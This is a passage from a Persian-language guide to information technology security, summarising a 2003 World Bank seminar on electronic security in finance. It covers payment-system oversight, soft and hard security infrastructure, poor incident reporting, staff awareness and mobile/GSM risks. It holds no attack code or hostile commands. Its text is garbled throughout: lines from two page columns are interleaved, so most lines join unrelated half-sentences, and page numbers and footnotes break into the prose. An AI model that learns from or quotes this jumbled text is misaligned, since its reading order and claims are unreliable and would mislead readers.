‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪ .‬ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪ ﻛـﻪ ﭘـﻮﻝ ﺭﺍﻳـﺞ‬
‫ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺭﻭﺯ‬
‫ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺳﺨﺖ ﺗﺮﺍﺯﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﻜﻠﺴﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺁﻧﻬﺎ‬
‫ﻭ ﻓﻬﺮﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﺎﺹ ﻭ ﭘﻴﭽﻴـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑﻠﻐﺎﺭﻫـﺎ ﺍﻳﻤﻨـﻲ‬
‫‪٢٢١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﻤﺒﻮﺩ ﺗﻴﻤﻬﺎﻱ‬


‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ‬ ‫ﺩﺭ ﺧﺼﻮﺹ ﻧﻘﺶ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺗﻌﻠﻴﻢﺩﻳـﺪﻩ‪ ،‬ﻓﻘـﺪﺍﻥ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻛـﺎﺭﺁﻱ ﺩﻭﻟﺘـﻲ ﺑـﺮﺍﻱ‬ ‫ﭘﺮﺩﺍﺧﺖ ﭘﺮﺳﺶ ﺩﺍﺭﻧﺪ ﻭ ﻣﻲﺧﻮﺍﻫﻨـﺪ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺁﻳـﺎ ﺑﺎﻳـﺪ ﺑـﺮ‬
‫ﻛﻨﺘﺮﻝ ﺻﺤﺖ‪ ،‬ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳـﻴﺎﺭ‪.‬‬ ‫ﺳﻴﺴﺘﻤﻬﺎ ﻧﻈﺎﺭﺕ ﺳﺨﺘﮕﻴﺮﺍﻧﻪﺗﺮﻱ ﺍﻋﻤﺎﻝ ﻛـﺮﺩ ﻳـﺎ ﻧـﻪ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﺳﺘﻮﻧﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑـﻪ‬ ‫ﻣﺜﺎﻝ ﺑﺮﺯﻳﻞ ﻭ ﺁﻓﺮﻳﻘﺎﻱ ﺟﻨﻮﺑﻲ ﺭﻭﺷﻬﺎﻱ ﺳﺨﺖﮔﻴﺮﺍﻧﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻫﻢ ﺑـﻪ ﻫﻤـﺎﻥ‬ ‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﺘﻘﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳـﻚ‬
‫ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻣﻴﻠﻴﺎﺭﺩﻫـﺎ ﺩﻻﺭ ﺳـﺮﻣﺎﻳﻪ ﺩﺭ‬ ‫ﺳﻴﺴﺘﻢ ﻛﺎﺭﺁ ﻭ ﺭﻗﺎﺑﺘﻲ ﻃﺮﺍﺣـﻲ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺷـﺮﺍﻳﻂ‪،‬‬
‫ﻣﻌﺮﺽ ﺧﻄﺮ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘـﺮﺩﺍﺧﺘﻦ‬ ‫ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﻋﺎﻣـﻞ ﺍﻧﺤـﺼﺎﺭ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺑﻪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺥ ﻣﻲﺩﻫﻨـﺪ‪ ،‬ﺑﻠﻜـﻪ ﺁﻥ‬ ‫ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ ﻭ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨـﺪ ‪ ،‬ﻭ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ ﭼﻪ ﻛﺎﺭﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪.‬‬ ‫ﻟﺬﺍ ﻣﺴﺘﻨﺪﺍﺕ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺷـﺎﻣﻞ ﺍﺭﺯﻳﺎﺑﻴﻬـﺎﻱ ﺩﻗﻴﻘـﻲ ﺍﺯ ﻧﺤـﻮﺓ‬
‫ﺗﺄﺛﻴﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﻧﻴﺰ ﺑﺸﻮﻧﺪ‪.‬‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪:‬‬
‫ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﻧﺮﻡ ﻭ ﺳﺨﺖ‬ ‫ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬

‫ﻳﻚ ﺗﻌﺮﻳﻒ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ‬ ‫ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎﻱ ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺑﺮ ﺿﺮﻭﺭﺕ ﺁﻣﻮﺯﺷﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ‬
‫ﻭ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺯﻣﻴﻨﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ‪ ،‬ﻭ ﻧﻬﺎﻳﺘـﹰﺎ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻲ ﻳﻚ ﺳﻴﺴﺘﻢ‬ ‫"ﻫﺮ ﺍﺑﺰﺍﺭ‪ ،‬ﻓﻦ‪ ،‬ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺩﺍﺭﺍﻳﻴﻬﺎﻱ ﺍﻃﻼﻋﺎﺗ ﹺ‬


‫ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣـﺎﻧﮕﻲ‪ ،‬ﺟﺎﻣﻌﻴـﺖ ﻳـﺎ ﺩﺭ‬ ‫ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺭﺍﺋـﻪ ﮔﺰﺍﺭﺷـﺎﺕ‬
‫ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﺍﺳﺖ‪ ،‬ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ"‪ .‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ‬ ‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻭ ﺑﺮﮔﺰﺍﺭﻱ ﺳـﻤﻴﻨﺎﺭﻫﺎ ﺩﺭ ﻣﻮﺿـﻮﻉ ﻛـﺎﻫﺶ‬
‫ﺩﻭ ﺯﻳﺮﺳﺎﺧﺖ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ‪ :‬ﺯﻳﺮﺑﻨﺎﻱ ﻧﺮﻡ ﺷﺎﻣﻞ ﺳﻴﺎﺳﺘﻬﺎ‪،‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﺮﻓﺖ‪.‬‬
‫ﺭﻭﺍﻟﻬــﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬــﺎ؛ ﻭ ﺯﻳﺮﺑﻨــﺎﻱ ﺳــﺨﺖ ﺷــﺎﻣﻞ‬
‫ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ‪ .‬ﺍﻓﺰﺍﻳﺶ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ‬ ‫ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۳‬‬
‫‪٢٣٥‬‬
‫ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﺗﻬﺪﻳـﺪﻫـﺎ ﻭ ﺍﺣﻴﺎﻧـﹰﺎ ﮔـﺴﺘﺮﺩﻩﺗـﺮ ﺷـﺪﻥ‬ ‫ﺍﻳﻤﻨﻲ ﻭ ﺳﻼﻣﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺗﺄﺛﻴﺮﺍﺕ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ‬ ‫ﺍﻳﻦ ﻧﺸﺴﺖ ﺑﺎ ﻋﻨﺎﻳﺖ ﺑﻪ ﺭﺷـﺪ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﺍﻫﻤﻴـﺖ‬
‫ﭘﻴﺶ ﺍﺯ ﺍﻳﻦ ﺩﻳﺪﻳﻢ ﺑﻪ ﻋﻠﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻭ ﮔـﺎﻩ‬ ‫ﺗﻮﺟﻪ ﺑﻪ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺩﺭ ﻗﺎﻟـﺐ ﺟﻬـﺎﻧﻲ‬
‫ﺗﺮﻭﺭﻳﺴﺘﻲ‪ ،‬ﺑﺮ ﺳﺮﻋﺖ ﻭ ﺷﺪﺕ ﺣﻤﻼﺕ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻫﻤـﺔ‬ ‫ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ‪ .‬ﺩﺭﺻﻮﺭﺕ ﺑﻲﻧﻈﻤﻲ ﺩﺭ ﺭﻭﺍﻟﻬﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ‪،‬‬
‫ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺳﺖ ﺑﻪ ﺩﺳﺖ ﻫﻢ ﻣﻲﺩﻫﻨﺪ ﺗﺎ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ‬ ‫ﻫﻤﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺧﻄـﺮﺳـﺎﺯﺗﺮ ﺷـﻮﻧﺪ‪ .‬ﺑﻴـﺸﺘﺮ‬
‫ﺑﻪ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﺍﻳـﺪﻩﺁﻝ ﻭ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺩﻗﻴﻖ ﻫﺴﺘﻨﺪ‪ .‬ﻋـﻼﻭﻩ‬
‫ﺍﺛﺮﺑﺨﺶ ﺗﺒﺪﻳﻞ ﻛﻨﻨﺪ‪.‬‬ ‫ﺑﺮ ﺍﻳﻦ‪ ،‬ﻛﺮﻣﻬﺎ‪ ،‬ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻧـﻮﺍﻉ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﮔﺴﺘﺮﺵ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﺑـﺎ‬ ‫ﺑﺮﺍﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﻧﻴﺎ ﻋﻮﺍﺭﺽ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ‪.‬‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻋﻈﻴﻤﻲ ﺭﻭﺑﺮﻭ ﺍﺳﺖ‪:‬‬
‫ﻻ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺠـﺎﻱ‬ ‫ﺍﻭﻝ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻨﺸﻲ ﺑﻮﺩﻥ‪ ،‬ﻭﺍﻛﻨﺸﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺎﻳﺪ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﺍﺩ ﺗـﺎ‬
‫‪ ۲۳۵‬ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀـﻮﺭ ﺍﻋﻀﺎﻱ ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔـﺰﺍﺭ‬
‫ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻌﺎﻻﻧﻪ ﻭ ﻣﺪﺍﻭﻡ ﺑﺎ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﻳﻨـﺪﻩ ﺑـﻪ‬ ‫ﺷــﺪ‪ .‬ﺍﻋـ ـﻀﺎﻱ ﺣﺎﺿــﺮ ﺩﺭ ﺟﻠــﺴـﻪ ﻋﺒــﺎﺭﺕ ﺑﻮﺩﻧــﺪ ﺍﺯ‪Thomas :‬‬
‫ﻣﺒﺎﺭﺯﻩ ﭘﺮﺩﺍﺧﺖ‪.‬‬ ‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪،Valerie McNevin‬‬
‫ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳـﻞ‪،‬‬
‫ﺩﻭﻡ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺯ ﺍﻫﻤﻴـﺖ ﻭﻳـﮋﻩﺍﻱ‬ ‫ﺷﻴﻠﻲ‪ ،‬ﻛﻠﻤﺒﻴﺎ‪ ،‬ﻣﻜﺰﻳﻚ‪ ،‬ﻋﺮﺑﺴﺘﺎﻥ ﺳﻌﻮﺩﻱ‪ ،‬ﺍﻭﻛـﺮﺍﻳﻦ‪ ،‬ﺍﺳـﺘﺮﺍﻟﻴﺎ‪ ،‬ﭼـﻴﻦ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺑﺨﺼﻮﺹ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻧـﺎﻇﺮﺍﻥ؛‬ ‫)ﭘﻜﻦ(‪ ،‬ﭼﻴﻦ )ﻫﻨﮓﻛﻨـﮓ(‪ ،‬ﻣـﺎﻟﺰﻱ‪ ،‬ﻓﻴﻠﻴﭙـﻴﻦ‪ ،‬ﺳـﻨﮕﺎﭘﻮﺭ‪ ،‬ﻭ ﺳـﺮﻳﻼﻧﻜﺎ‪.‬‬
‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺻﻠﻲ ﺍﻳﻦ ﻧﺸﺴﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺩﺭﺱ ﺯﻳـﺮ‬
‫ﺍﻣﺎ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﻛﺸﻮﺭ ﻭﺍﺣﺪ ﻫﻢ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ‬ ‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺍﺧﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﺮﻱ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ‪.‬‬ ‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E-‬‬
‫‪Security/E-Finance&Presentations‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢٢‬‬

‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎ ﺗـﺪﻭﻳﻦ‬ ‫ﺳﻮﻡ‪ ،‬ﻋﺪﻡ ﮔـﺰﺍﺭﺵ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻳـﻚ ﻣـﺎﻧﻊ ﺟـﺪﻱ ﺑـﺮﺍﻱ ﺩﺭﻙ‬
‫ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻣﺴﻴﺮ ﺗﻤﺎﻡ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ‬ ‫ﻣﺤﺪﻭﺩﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻫﻨﻮﺯ ﺑﻲ ﻣﻴﻠـﻲ ﻗﺎﺑـﻞ‬
‫ﻓــﺮﺍﻫﻢ ﻣــﻲﺁﻭﺭﺩ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﺑﺮﻧﺎﻣــﻪﺍﻱ ﺑﺎﻳــﺪ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬ ‫ﺗﻮﺟﻬﻲ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻋﻤﻮﻣﻲ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺁﮔﺎﻫﻲﻳﺎﻓﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ‬ ‫ﭼﻬﺎﺭﻡ‪ ،‬ﻋﻼﻭﻩ ﺑﺮ ﺑـﻲﻋﻼﻗﮕـﻲ ﻣﺆﺳـﺴﺎﺕ ﺑـﻪ ﮔـﺰﺍﺭﺵﻛـﺮﺩﻥ‬
‫ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻧﻴـﺰ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻋﻠﻴﺮﻏﻢ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﺑﺘﻜﺎﺭﻱ ‪ ،‬ﻫﻨﻮﺯ ﻫﻢ ﺍﻣﻨﻴﺖ‬ ‫ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺑﻪ ﺍﻣﺮﻱ ﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻧﺸﺪﻩ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﭽﻨﺎﻥ ﻣﺮﺍﻗﺒﺖ ﻭ‬ ‫ﺳﺮﺍﻧﺠﺎﻡ ﺁﻧﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻧﻘﺶ ﻣﺤﻮﺭﻱ ﺑﺎﺯﻱ ﻣﻲﻛﻨﻨـﺪ‬
‫ﺁﻣﻮﺯﺵ ﻣﺪﺍﻭﻡ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺒﺎﺣـﺚ‬
‫ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷـﺒﻜﻪ ﺭﺍ ﺯﻳـﺮ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺟﻪ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻃﻠﺒﻨـﺪ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ‪:‬‬
‫ﺳﺆﺍﻝ ﺑﺒﺮﺩ؛ ﻭ ﻟﺬﺍ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺁﮔﺎﻫﻲ ﺗﻤﺎﻡ ﺍﻓـﺮﺍﺩ ﻧـﺴﺒﺖ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ‪ ،‬ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢ ﻳـﺎﺏ‪ ،‬ﻭ‬
‫ﺑﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪.‬‬
‫ﺩﺭﺳﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻧـﺸﻮﻧﺪ‪ ،‬ﻧـﺎﮔﺰﻳﺮ ﺍﻋﺘﻤـﺎﺩ ﻋﻤـﻮﻣﻲ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻱ ﺧﺪﺷﻪﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﺑﺮﺍﻱ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳﻴﺎﺭ‪:‬‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﻮﺡ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻱ‬
‫ﺩﺳﺘﺎﻭﺭﺩﻫﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪ‬ ‫ﻣﺘﻌﺪﺩ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺩﺍﺷﺖ‪:‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ GSM ،۲۰۰۲‬ﺣﺪﻭﺩ ‪ ۷۸۷‬ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳـﺮ‬ ‫ﺍﻭﻝ‪ ،‬ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ‪ ،‬ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﺳﺎﻳﺮ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺑـﺎﺯﺍﺭ‬
